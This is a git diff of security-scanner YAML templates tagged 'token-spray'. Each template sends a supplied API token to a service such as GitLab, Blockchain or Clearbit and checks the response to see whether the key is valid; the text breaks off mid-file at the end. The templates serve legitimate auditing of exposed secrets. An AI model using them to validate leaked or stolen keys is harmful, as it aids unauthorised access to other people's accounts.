+1,41 @@ +id: api-abuseipdb + +info: + name: AbuseIPDB API - Test + author: daffainfo + severity: info + description: AbuseIPDB API test was conducted. + reference: + - https://docs.abuseipdb.com/ + - https://github.com/daffainfo/all-about-apikey/tree/main/abuseipdb + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: token-spray,abuseipdb + +self-contained: true + +http: + - raw: + - | + POST https://api.abuseipdb.com/api/v2/report HTTP/1.1 + Host: api.abuseipdb.com + Key: {{token}} + Accept: application/json + Content-Type: application/x-www-form-urlencoded + Content-Length: 16 + + ip=127.0.0.1&categories=18,22&comment=SSH%20login%20attempts%20with%20user%20root. + + matchers: + - type: word + part: body + words: + - 'data":' + - 'ipAddress":' + condition: and + +# digest: 4a0a00473045022026c2d562a4f7dc93f0e27e3a45a21c8baad795377bcfeb24e6204a9243b63112022100ed4cabe0abae1bdaa6674449f8e3cdbc1eebeb4b6e7a3f4ced7b85f7288324bd:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-abuseipdb.yaml b/poc/api/api-abuseipdb.yaml deleted file mode 100644 index ca83d86700..0000000000 --- a/poc/api/api-abuseipdb.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-abuseipdb - -info: - name: AbuseIPDB API Test - author: daffainfo - severity: info - reference: - - https://docs.abuseipdb.com/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md - tags: token-spray,abuseipdb - -self-contained: true -requests: - - raw: - - | - POST https://api.abuseipdb.com/api/v2/report HTTP/1.1 - Host: api.abuseipdb.com - Key: {{token}} - Accept: application/json - Content-Type: application/x-www-form-urlencoded - Content-Length: 16 - - ip=127.0.0.1&categories=18,22&comment=SSH%20login%20attempts%20with%20user%20root. - - matchers: - - type: word - part: body - words: - - 'data":' - - 'ipAddress":' - condition: and diff --git a/poc/api/api-adafruit-io-387.yaml b/poc/api/api-adafruit-io-387.yaml new file mode 100644 index 0000000000..87985ad5a3 --- /dev/null +++ b/poc/api/api-adafruit-io-387.yaml @@ -0,0 +1,30 @@ +id: api-adafruit-io + +info: + name: Adafruit IO API Test + author: dwisiswant0 + severity: info + reference: + - https://io.adafruit.com/api/docs/ + metadata: + max-request: 1 + tags: token-spray,adafruit + +self-contained: true + +http: + - method: GET + path: + - "https://io.adafruit.com/api/v2/user" + + headers: + X-AIO-Key: "{{token}}" + matchers: + - type: word + part: body + words: + - '"username":' + - '"id":' + condition: and + +# digest: 4a0a00473045022100bd2cde5742fc5e144ec6165cbc4dac66a0c51f4c574e845586f7ad8a47b196cb02206243f827c0ea95f3c051255499e838a938ac1a03275a636a90746a583327cd9e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-adafruit-io.yaml b/poc/api/api-adafruit-io.yaml deleted file mode 100644 index 5fc0e8d40c..0000000000 --- a/poc/api/api-adafruit-io.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: api-adafruit-io - -info: - name: Adafruit IO API Test - author: dwisiswant0 - severity: info - reference: https://io.adafruit.com/api/docs/ - tags: token-spray,adafruit - -self-contained: true -requests: - - method: GET - path: - - "https://io.adafruit.com/api/v2/user" - headers: - X-AIO-Key: "{{token}}" - - matchers: - - type: word - part: body - words: - - '"username":' - - '"id":' - condition: and \ No newline at end of file diff --git a/poc/api/api-alienvault-390.yaml b/poc/api/api-alienvault-389.yaml similarity index 100% rename from poc/api/api-alienvault-390.yaml rename to poc/api/api-alienvault-389.yaml diff --git a/poc/api/api-alienvault.yaml b/poc/api/api-alienvault.yaml deleted file mode 100644 index 254c5be20d..0000000000 --- a/poc/api/api-alienvault.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-alienvault - -info: - name: AlienVault Open Threat Exchange (OTX) API Test - author: daffainfo - severity: info - reference: - - https://otx.alienvault.com/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/AlienVault%20Open%20Threat%20Exchange.md - tags: token-spray,alienvault,exchange - -self-contained: true -requests: - - raw: - - | - GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 - Host: otx.alienvault.com - X-OTX-API-KEY: {{token}} - - matchers: - - type: word - part: body - words: - - '"$schema":' - - '"properties":' - condition: and diff --git a/poc/api/api-apigee-edge-391.yaml b/poc/api/api-apigee-edge-391.yaml new file mode 100644 index 0000000000..e2d7fba259 --- /dev/null +++ b/poc/api/api-apigee-edge-391.yaml @@ -0,0 +1,36 @@ +id: api-apigee-edge + +info: + name: Apigee Edge API Test + author: dwisiswant0 + severity: info + reference: + - https://apidocs.apigee.com/apis + metadata: + max-request: 1 + tags: token-spray,apigee + +self-contained: true + +http: + - method: GET + path: + - "https://apimonitoring.enterprise.apigee.com/alerts" + + headers: + Authorization: Bearer {{token}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"uuid":' + - '"name":' + condition: and + +# digest: 4a0a00473045022100e845a1ceb69b8a5d6c312ad52ccdbed0e07b6bca2d1cbef0354f9c9f46b486a702203ef383498432551eb9091e1ec2acab8f8a0979e1a66312addc036e38e9de000f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-apigee-edge.yaml b/poc/api/api-apigee-edge.yaml deleted file mode 100644 index e724933ea0..0000000000 --- a/poc/api/api-apigee-edge.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: api-apigee-edge - -info: - name: Apigee Edge API Test - author: dwisiswant0 - severity: info - reference: https://apidocs.apigee.com/apis - tags: token-spray,apigee - -self-contained: true -requests: - - method: GET - path: - - "https://apimonitoring.enterprise.apigee.com/alerts" - headers: - Authorization: Bearer {{token}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"uuid":' - - '"name":' - condition: and diff --git a/poc/api/api-appveyor-392.yaml b/poc/api/api-appveyor-392.yaml new file mode 100644 index 0000000000..d868abd588 --- /dev/null +++ b/poc/api/api-appveyor-392.yaml @@ -0,0 +1,31 @@ +id: api-appveyor + +info: + name: AppVeyor API Test + author: dwisiswant0 + severity: info + reference: + - https://www.appveyor.com/docs/api/ + metadata: + max-request: 1 + tags: token-spray,appveyor + +self-contained: true + +http: + - method: GET + path: + - "https://ci.appveyor.com/api/roles" + + headers: + Content-Type: application/json + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - '"roleId":' + - '"created":' + condition: and + +# digest: 490a00463044022015e6f1f344553fca9c4d1692f24a0f16dfd25d843ca49e5e964b62de347863e9022059f1676f4a19b82033665201e9ba232546dc2321a3469bad64e04a80191e5af2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-appveyor.yaml b/poc/api/api-appveyor.yaml deleted file mode 100644 index 25bac0e370..0000000000 --- a/poc/api/api-appveyor.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-appveyor - -info: - name: AppVeyor API Test - author: dwisiswant0 - severity: info - reference: https://www.appveyor.com/docs/api/ - tags: token-spray,appveyor - -self-contained: true -requests: - - method: GET - path: - - "https://ci.appveyor.com/api/roles" - headers: - Content-Type: application/json - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - '"roleId":' - - '"created":' - condition: and \ No newline at end of file diff --git a/poc/api/api-asana-393.yaml b/poc/api/api-asana-393.yaml index 1e4738084e..9608f3c236 100644 --- a/poc/api/api-asana-393.yaml +++ b/poc/api/api-asana-393.yaml @@ -3,24 +3,18 @@ id: api-asana info: name: Asana API Test author: zzeitlin + reference: https://developers.asana.com/docs/using-terminal severity: info - description: Programmatic access to all data in your asana system - reference: - - https://developers.asana.com/docs/using-terminal - - https://github.com/daffainfo/all-about-apikey/tree/main/asana - metadata: - max-request: 1 tags: token-spray,asana self-contained: true - -http: +requests: - method: GET path: - "https://app.asana.com/api/1.0/users/me" - headers: Authorization: Bearer {{token}} + matchers: - type: word part: body @@ -29,5 +23,3 @@ http: - 'email' - 'name' condition: and - -# digest: 4b0a00483046022100f606c661876315023d560d20978ca2f27fba1b2e4493c76c486c8f6b6ac2c943022100855a74c20f0955665c3407d0fc22b6d17949fdc92ca06307417bf222b0930121:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-bingmaps-395.yaml b/poc/api/api-bingmaps-395.yaml deleted file mode 100644 index 17c0d216aa..0000000000 --- a/poc/api/api-bingmaps-395.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: api-bingmaps - -info: - name: Bing Maps API Test - author: zzeitlin - reference: https://docs.microsoft.com/en-us/bingmaps/rest-services/locations/find-a-location-by-address - severity: info - tags: token-spray,bing,maps,bingmaps - -self-contained: true -requests: - - method: GET - path: - - "https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key={{token}}" - - matchers: - - type: word - part: body - words: - - 'ValidCredentials' diff --git a/poc/api/api-bingmaps.yaml b/poc/api/api-bingmaps.yaml index 0892d85b9f..17c0d216aa 100644 --- a/poc/api/api-bingmaps.yaml +++ b/poc/api/api-bingmaps.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,bing,maps,bingmaps +self-contained: true requests: - method: GET path: diff --git a/poc/api/api-bitly-396.yaml b/poc/api/api-bitly-396.yaml index 57e1d5d3d4..0a4c307e15 100644 --- a/poc/api/api-bitly-396.yaml +++ b/poc/api/api-bitly-396.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,bitly +self-contained: true requests: - method: GET path: @@ -15,6 +16,7 @@ requests: matchers: - type: word part: body - negative: true words: - - 'INVALID_ARG_ACCESS_TOKEN' + - '"long_url":' + - '"created_at":' + condition: and \ No newline at end of file diff --git a/poc/api/api-bitly.yaml b/poc/api/api-bitly.yaml new file mode 100644 index 0000000000..57e1d5d3d4 --- /dev/null +++ b/poc/api/api-bitly.yaml @@ -0,0 +1,20 @@ +id: api-bitly + +info: + name: Bitly API Test + author: zzeitlin + reference: https://dev.bitly.com/api-reference + severity: info + tags: token-spray,bitly + +requests: + - method: GET + path: + - "https://api-ssl.bitly.com/v3/shorten?access_token={{token}}&longUrl=https://www.google.com" + + matchers: + - type: word + part: body + negative: true + words: + - 'INVALID_ARG_ACCESS_TOKEN' diff --git a/poc/api/api-blockchain-398.yaml b/poc/api/api-blockchain-398.yaml new file mode 100644 index 0000000000..edcb10fe49 --- /dev/null +++ b/poc/api/api-blockchain-398.yaml @@ -0,0 +1,35 @@ +id: api-blockchain + +info: + name: Blockchain API Test + author: daffainfo + severity: info + description: Bitcoin Payment, Wallet & Transaction Data + reference: + - https://api.blockchain.com/v3/#/ + - https://github.com/daffainfo/all-about-apikey/tree/main/blockchain + classification: + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: token-spray,blockchain + +self-contained: true + +http: + - raw: + - | + GET https://api.blockchain.com/v3/exchange/accounts HTTP/1.1 + Host: api.blockchain.com + X-API-Token: {{token}} + + matchers: + - type: word + part: body + words: + - '"currency"' + - '"balance"' + - '"available"' + condition: and + +# digest: 490a0046304402201940dafe64505005b67796f616913ec59074288c8967f03a60c1b267796561790220030733f886ac2542be7e2e64e7c9914c450737c940edac691b2a764a03bde3b2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-blockchain.yaml b/poc/api/api-blockchain.yaml deleted file mode 100644 index 4f027d84d3..0000000000 --- a/poc/api/api-blockchain.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-blockchain - -info: - name: Blockhain API Test - author: daffainfo - severity: info - reference: - - https://api.blockchain.com/v3/#/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockchain.md - tags: token-spray,blockchain - -self-contained: true -requests: - - raw: - - | - GET https://api.blockchain.com/v3/exchange/accounts HTTP/1.1 - Host: api.blockchain.com - X-API-Token: {{token}} - - matchers: - - type: word - part: body - words: - - '"currency"' - - '"balance"' - - '"available"' - condition: and diff --git a/poc/api/api-buildkite.yaml b/poc/api/api-buildkite-402.yaml similarity index 100% rename from poc/api/api-buildkite.yaml rename to poc/api/api-buildkite-402.yaml diff --git a/poc/api/api-buttercms.yaml b/poc/api/api-buttercms.yaml new file mode 100644 index 0000000000..229da7b1d5 --- /dev/null +++ b/poc/api/api-buttercms.yaml @@ -0,0 +1,19 @@ +id: api-buttercms + +info: + name: ButterCMS API Test + author: zzeitlin + reference: https://buttercms.com/docs/api/#introduction + severity: info + tags: token-spray,buttercms + +requests: + - method: GET + path: + - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" + + matchers: + - type: status + status: + - 401 + negative: true diff --git a/poc/api/api-calendly-404.yaml b/poc/api/api-calendly-404.yaml index 10a8e83478..1d8289fb37 100644 --- a/poc/api/api-calendly-404.yaml +++ b/poc/api/api-calendly-404.yaml @@ -7,7 +7,6 @@ info: severity: info tags: token-spray,calendly -self-contained: true requests: - method: GET path: @@ -16,10 +15,6 @@ requests: X-Token: "{{token}}" matchers: - - type: word - part: body - words: - - '"data":' - - '"id":' - - '"email":' - condition: and \ No newline at end of file + - type: status + status: + - 200 diff --git a/poc/api/api-calendly.yaml b/poc/api/api-calendly.yaml deleted file mode 100644 index 1d8289fb37..0000000000 --- a/poc/api/api-calendly.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: api-calendly - -info: - name: Calendly API Test - author: zzeitlin - reference: https://calendly.stoplight.io/docs/api-docs-v1/b3A6MTg3MDczNg-about-me - severity: info - tags: token-spray,calendly - -requests: - - method: GET - path: - - "https://calendly.com/api/v1/users/me" - headers: - X-Token: "{{token}}" - - matchers: - - type: status - status: - - 200 diff --git a/poc/api/api-circleci-405.yaml b/poc/api/api-circleci-405.yaml index 281d22b656..cfe7672786 100644 --- a/poc/api/api-circleci-405.yaml +++ b/poc/api/api-circleci-405.yaml @@ -7,12 +7,16 @@ info: severity: info tags: token-spray,circle,circleci +self-contained: true requests: - method: GET path: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"admin"' + - '"login"' + condition: and diff --git a/poc/api/api-circleci-406.yaml b/poc/api/api-circleci.yaml similarity index 100% rename from poc/api/api-circleci-406.yaml rename to poc/api/api-circleci.yaml diff --git a/poc/api/api-clearbit-407.yaml b/poc/api/api-clearbit-407.yaml deleted file mode 100644 index 94947bf3d0..0000000000 --- a/poc/api/api-clearbit-407.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-clearbit - -info: - name: Clearbit API Test - author: daffainfo - severity: info - description: Search for company logos and embed them in your projects - reference: - - https://clearbit.com/docs - - https://github.com/daffainfo/all-about-apikey/tree/main/clearbit - metadata: - max-request: 1 - tags: token-spray,clearbit - -self-contained: true - -http: - - raw: - - | - GET https://person.clearbit.com/v2/combined/find?email=alex@clearbit.com HTTP/1.1 - Authorization: Basic {{base64(token + ':')}} - Host: person.clearbit.com - - matchers: - - type: word - part: body - words: - - '"person":' - - '"id":' - - '"name":' - condition: and - -# digest: 490a004630440220010e94009002269a73e09fb4768b915134e95de8009d9585a35dcc2677ca6624022045b2e14c7e9c9658f0d1ac7693bafb54bb02fd577e8a2b76bc0dd566879fa491:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-clearbit.yaml b/poc/api/api-clearbit.yaml new file mode 100644 index 0000000000..fc8cf9c9ea --- /dev/null +++ b/poc/api/api-clearbit.yaml @@ -0,0 +1,28 @@ +id: api-clearbit + +info: + name: Clearbit API Test + author: daffainfo + severity: info + description: Search for company logos and embed them in your projects + reference: + - https://clearbit.com/docs + - https://github.com/daffainfo/all-about-apikey/tree/main/clearbit + tags: token-spray,clearbit + +self-contained: true +requests: + - raw: + - | + GET https://person.clearbit.com/v2/combined/find?email=alex@clearbit.com HTTP/1.1 + Authorization: Basic {{base64(token + ':')}} + Host: person.clearbit.com + + matchers: + - type: word + part: body + words: + - '"person":' + - '"id":' + - '"name":' + condition: and diff --git a/poc/api/api-cooperhewitt-411.yaml b/poc/api/api-cooperhewitt-411.yaml index 0da30b58ee..c54d64e093 100644 --- a/poc/api/api-cooperhewitt-411.yaml +++ b/poc/api/api-cooperhewitt-411.yaml @@ -16,10 +16,6 @@ requests: - "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}" matchers: - - type: word - part: body - words: - - '"stat":' - - '"formats":' - - '"default_format":' - condition: and + - type: status + status: + - 200 diff --git a/poc/api/api-covalent-412.yaml b/poc/api/api-covalent-412.yaml new file mode 100644 index 0000000000..0164e47342 --- /dev/null +++ b/poc/api/api-covalent-412.yaml @@ -0,0 +1,31 @@ +id: api-covalent + +info: + name: Covalent API Test + author: daffainfo + severity: info + description: https://github.com/daffainfo/all-about-apikey/tree/main/covalent + reference: + - https://www.covalenthq.com/docs/api/ + - https://github.com/daffainfo/all-about-apikey/tree/main/covalent + metadata: + max-request: 1 + tags: token-spray,covalent + +self-contained: true + +http: + - method: GET + path: + - "https://api.covalenthq.com/v1/3/address/balances_v2/?&key={{token}}" + + matchers: + - type: word + part: body + words: + - '"address":' + - '"updated_at":' + - '"next_update_at":' + condition: and + +# digest: 4a0a00473045022070275851f3193991afa65cf05940ad6fec232b3f2f0222da1b562741e97407c1022100fac147b8069000c48d1e48953d55ba052d76d10690be100c8b177581dc641d98:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-covalent.yaml b/poc/api/api-covalent.yaml deleted file mode 100644 index 9fb44a3d2e..0000000000 --- a/poc/api/api-covalent.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-covalent - -info: - name: Covalent API Test - author: daffainfo - severity: info - description: https://github.com/daffainfo/all-about-apikey/tree/main/covalent - reference: - - https://www.covalenthq.com/docs/api/ - - https://github.com/daffainfo/all-about-apikey/tree/main/covalent - tags: token-spray,covalent - -self-contained: true -requests: - - method: GET - path: - - "https://api.covalenthq.com/v1/3/address/balances_v2/?&key={{token}}" - - matchers: - - type: word - part: body - words: - - '"address":' - - '"updated_at":' - - '"next_update_at":' - condition: and diff --git a/poc/api/api-debounce-414.yaml b/poc/api/api-debounce-414.yaml new file mode 100644 index 0000000000..5165087c3d --- /dev/null +++ b/poc/api/api-debounce-414.yaml @@ -0,0 +1,30 @@ +id: api-debounce + +info: + name: DeBounce API Test + author: 0ri2N + severity: info + reference: + - https://developers.debounce.io/reference/api-key-authentication + - https://debounce.io + metadata: + max-request: 1 + tags: debounce,token-spray + +self-contained: true + +http: + - method: GET + path: + - "https://api.debounce.io/v1/?api={{token}}&email=test@interact.sh" + + matchers: + - type: word + part: body + words: + - '"balance":' + - '"success":' + - '"debounce":' + condition: and + +# digest: 4b0a00483046022100e57b205a3f73c6e7e29816f801b5277bd2dbe0c6134dd792258d95567af00b53022100a1cd71dd14faa6281554f570b8499e0a59d0247273e01878709c3e6b19084032:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-debounce.yaml b/poc/api/api-debounce.yaml deleted file mode 100644 index 2ed95d091b..0000000000 --- a/poc/api/api-debounce.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-debounce - -info: - name: DeBounce API Test - author: 0ri2N - severity: info - reference: - - https://developers.debounce.io/reference/api-key-authentication - - https://debounce.io - tags: debounce,token-spray - -self-contained: true -requests: - - method: GET - path: - - "https://api.debounce.io/v1/?api={{token}}&email=test@example.com" - - matchers: - - type: word - part: body - words: - - '"balance":' - - '"success":' - - '"debounce":' - condition: and diff --git a/poc/api/api-dribbble-416.yaml b/poc/api/api-dribbble-416.yaml index ec36263d18..d9dd5f5a41 100644 --- a/poc/api/api-dribbble-416.yaml +++ b/poc/api/api-dribbble-416.yaml @@ -4,13 +4,17 @@ info: name: Dribbble API Test author: daffainfo severity: info + description: Dribbble is a self-promotion and social networking platform for digital designers and creatives reference: - https://developer.dribbble.com/v2/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md + - https://github.com/daffainfo/all-about-apikey/tree/main/dribbble + metadata: + max-request: 1 tags: token-spray,dribbble self-contained: true -requests: + +http: - method: GET path: - "https://api.dribbble.com/v2/user?access_token={{token}}" @@ -19,3 +23,5 @@ requests: - type: status status: - 200 + +# digest: 490a0046304402207ca77c15aa3f5dc5598a37cbd3e79b882bf1ac2c6144c11a17a4832dda005035022074dd2aa3ddcdbcc547cbc65d4d0dd7033d9d0198ea69032bd1dbe3f28068a2c8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-dribbble.yaml b/poc/api/api-dribbble-417.yaml similarity index 100% rename from poc/api/api-dribbble.yaml rename to poc/api/api-dribbble-417.yaml diff --git a/poc/api/api-dropbox.yaml b/poc/api/api-dropbox.yaml deleted file mode 100644 index 29679e2b2f..0000000000 --- a/poc/api/api-dropbox.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: api-dropbox - -info: - name: Dropbox API Test - author: zzeitlin - reference: https://www.dropbox.com/developers/documentation/http/documentation - severity: info - tags: token-spray,dropbox - -requests: - - method: POST - path: - - "https://api.dropboxapi.com/2/users/get_current_account" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: status - status: - - 200 diff --git a/poc/api/api-europeana-419.yaml b/poc/api/api-europeana-419.yaml index c0767ce8d7..bbc103ac30 100644 --- a/poc/api/api-europeana-419.yaml +++ b/poc/api/api-europeana-419.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://pro.europeana.eu/page/search - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Europeana.md tags: token-spray,europeana self-contained: true diff --git a/poc/api/api-europeana-421.yaml b/poc/api/api-europeana-421.yaml deleted file mode 100644 index 713a3a7e6e..0000000000 --- a/poc/api/api-europeana-421.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: api-europeana - -info: - name: Europeana API Test - author: daffainfo - severity: info - description: European Museum and Galleries content - reference: - - https://pro.europeana.eu/page/search - - https://github.com/daffainfo/all-about-apikey/tree/main/europeana - metadata: - max-request: 1 - tags: token-spray,europeana - -self-contained: true - -http: - - method: GET - path: - - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" - - matchers: - - type: word - part: body - words: - - 'success' - - 'apikey' - - 'action' - condition: and - -# digest: 4a0a004730450220403070e888a319ba4a50aadc9e5d82db018198fb50ac63142aeca81fb62dc496022100f98c0738e60b20fb3a4dcfb88eed70705433fc0c6d902f699fc4f7de3d5de1e9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-fastly-424.yaml b/poc/api/api-fastly-424.yaml new file mode 100644 index 0000000000..9688149ef5 --- /dev/null +++ b/poc/api/api-fastly-424.yaml @@ -0,0 +1,25 @@ +id: api-fastly + +info: + name: Fastly API Test + author: Adam Crosser + severity: info + reference: + - https://developer.fastly.com/reference/api/ + tags: token-spray,fastly + +self-contained: true +requests: + - method: GET + path: + - "https://api.fastly.com/current_user" + headers: + Fastly-Key: "{{token}}" + + matchers: + - type: word + part: body + words: + - '"created_at":' + - '"customer_id":' + condition: and diff --git a/poc/api/api-fastly.yaml b/poc/api/api-fastly.yaml index 9688149ef5..e6555d706f 100644 --- a/poc/api/api-fastly.yaml +++ b/poc/api/api-fastly.yaml @@ -3,23 +3,19 @@ id: api-fastly info: name: Fastly API Test author: Adam Crosser + reference: https://developer.fastly.com/reference/api/ severity: info - reference: - - https://developer.fastly.com/reference/api/ tags: token-spray,fastly self-contained: true requests: - method: GET path: - - "https://api.fastly.com/current_user" + - "https://api.fastly.com/service" headers: Fastly-Key: "{{token}}" matchers: - - type: word - part: body - words: - - '"created_at":' - - '"customer_id":' - condition: and + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/api/api-fastly.yml b/poc/api/api-fastly.yml deleted file mode 100644 index e6555d706f..0000000000 --- a/poc/api/api-fastly.yml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-fastly - -info: - name: Fastly API Test - author: Adam Crosser - reference: https://developer.fastly.com/reference/api/ - severity: info - tags: token-spray,fastly - -self-contained: true -requests: - - method: GET - path: - - "https://api.fastly.com/service" - headers: - Fastly-Key: "{{token}}" - - matchers: - - type: status - status: - - 200 \ No newline at end of file diff --git a/poc/api/api-fontawesome-426.yaml b/poc/api/api-fontawesome-426.yaml new file mode 100644 index 0000000000..7477c4ced9 --- /dev/null +++ b/poc/api/api-fontawesome-426.yaml @@ -0,0 +1,36 @@ +id: api-fontawesome + +info: + name: FontAwesome API Test + author: dwisiswant0 + severity: info + reference: + - https://fontawesome.com/v6.0/docs/apis/graphql/get-started + metadata: + max-request: 1 + tags: token-spray,fontawesome + +self-contained: true + +http: + - method: GET + path: + - "https://api.fontawesome.com/token" + + headers: + Authorization: Bearer {{token}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"access_token":' + - '"scopes":' + condition: and + +# digest: 4a0a00473045022100fad889751ecbb957a45d41eba9a93dc0ce02319c19b76087e5d8935f82fbac87022029dcee0fdcfb680c73deb8fdde836a1d7a531391f03314a7ba29ba9b838bdd0f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-fontawesome.yaml b/poc/api/api-fontawesome.yaml deleted file mode 100644 index 3a990014df..0000000000 --- a/poc/api/api-fontawesome.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: api-fontawesome - -info: - name: FontAwesome API Test - author: dwisiswant0 - reference: https://fontawesome.com/v6.0/docs/apis/graphql/get-started - severity: info - tags: token-spray,fontawesome - -self-contained: true -requests: - - method: GET - path: - - "https://api.fontawesome.com/token" - headers: - Authorization: Bearer {{token}} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"access_token":' - - '"scopes":' - condition: and diff --git a/poc/api/api-fullhunt-428.yaml b/poc/api/api-fullhunt-428.yaml deleted file mode 100644 index 482e0add20..0000000000 --- a/poc/api/api-fullhunt-428.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: api-fullhunt - -info: - name: FullHunt API Test - author: 0ri2N - severity: info - description: | - FullHunt holds one of the largest Databases for external attack surfaces of the entire Internet. - reference: - - https://fullhunt.io - - https://api-docs.fullhunt.io - metadata: - max-request: 1 - tags: scan,recon,fullhunt,token-spray - -self-contained: true - -http: - - method: GET - path: - - https://fullhunt.io/api/v1/domain/interact.sh/details - - headers: - X-API-Key: "{{token}}" - matchers: - - type: word - part: body - words: - - '"dns"' - - '"hosts"' - - '"domain"' - condition: and - -# digest: 490a0046304402204f47d3dda160c97d6d7dbbc58055bd71e3f56df6076538d0fe0e889984987ebc02206ba9c340c581b0432223893d5b1138c0c07420a3e5213c0d9e4a9c7257df938f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-fullhunt.yaml b/poc/api/api-fullhunt.yaml new file mode 100644 index 0000000000..dd160e504b --- /dev/null +++ b/poc/api/api-fullhunt.yaml @@ -0,0 +1,29 @@ +id: api-fullhunt + +info: + name: FullHunt API Test + author: 0ri2N + severity: info + description: | + FullHunt holds one of the largest Databases for external attack surfaces of the entire Internet. + reference: + - https://fullhunt.io + - https://api-docs.fullhunt.io + tags: dns,scan,recon,fullhunt,database,token-spray + +self-contained: true +requests: + - method: GET + path: + - https://fullhunt.io/api/v1/domain/example.com/details + headers: + X-API-Key: "{{token}}" + + matchers: + - type: word + part: body + words: + - '"dns"' + - '"hosts"' + - '"domain"' + condition: and diff --git a/poc/api/api-gitlab-431.yaml b/poc/api/api-gitlab-431.yaml index 8372a3c8a0..96a5bde8a9 100644 --- a/poc/api/api-gitlab-431.yaml +++ b/poc/api/api-gitlab-431.yaml @@ -6,16 +6,19 @@ info: severity: info reference: - https://docs.gitlab.com/ee/api/personal_access_tokens.html + metadata: + max-request: 1 tags: token-spray,gitlab self-contained: true -requests: + +http: - method: GET path: - "https://gitlab.com/api/v4/personal_access_tokens" + headers: PRIVATE-TOKEN: "{{token}}" - matchers: - type: word part: body @@ -23,3 +26,5 @@ requests: - '"id":' - '"created_at":' condition: and + +# digest: 4a0a00473045022018e1d08da7b95bd30fe3380bf4314f6ea6c51c6885fe6e8c30838de488d446b8022100d1806cb0d3f05c93ba34ce2ff0796ad4bd0c2d4ea6a40962b628d43ac829abea:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-gitlab.yaml b/poc/api/api-gitlab.yml similarity index 100% rename from poc/api/api-gitlab.yaml rename to poc/api/api-gitlab.yml diff --git a/poc/api/api-heroku-435.yaml b/poc/api/api-heroku-435.yaml index 9f08e416d5..ef9b58c7ae 100644 --- a/poc/api/api-heroku-435.yaml +++ b/poc/api/api-heroku-435.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,heroku +self-contained: true requests: - method: POST path: @@ -16,10 +17,9 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 200 - - 201 - - 202 - - 206 - condition: or + - type: word + part: body + words: + - '"created_at":' + - '"git_url":' + condition: and \ No newline at end of file diff --git a/poc/api/api-hirak-rates-436.yaml b/poc/api/api-hirak-rates-436.yaml new file mode 100644 index 0000000000..0557cf59fe --- /dev/null +++ b/poc/api/api-hirak-rates-436.yaml @@ -0,0 +1,32 @@ +id: api-hirak-rates + +info: + name: Hirak Exchange Rates API Test + author: daffainfo + severity: info + description: Exchange rates between 162 currency & 300 crypto currency update each 5 min, accurate, no limits + reference: + - https://rates.hirak.site/ + - https://github.com/daffainfo/all-about-apikey/tree/main/hirak-exchange-rates + metadata: + max-request: 1 + tags: token-spray,hirak + +self-contained: true + +http: + - method: GET + path: + - "https://rates.hirak.site/stat/?token={{token}}" + + matchers: + - type: word + part: body + words: + - '"token":' + - '"plan":' + - '"hits":' + - '"remain":' + condition: and + +# digest: 